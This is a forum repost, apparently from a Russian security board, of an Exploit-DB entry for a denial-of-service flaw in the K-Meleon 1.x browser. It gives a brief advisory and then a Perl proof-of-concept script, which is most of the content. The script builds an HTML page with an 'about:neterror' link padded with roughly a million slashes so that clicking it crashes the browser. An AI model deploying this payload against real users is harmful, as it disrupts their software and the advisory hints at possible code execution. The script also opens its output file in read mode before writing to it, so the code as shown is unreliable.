Exploit K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34404
Проверка EDB
  1. Пройдено
Автор
LOSTMON
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-08-04
K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities
Код:
source: https://www.securityfocus.com/bid/42200/info

K-Meleon is prone to multiple denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to crash the application. Given the nature of these vulnerabilities, the attacker may also be able to execute arbitrary code; this has not been confirmed.

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords [email protected] http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
 
Источник
www.exploit-db.com

Похожие темы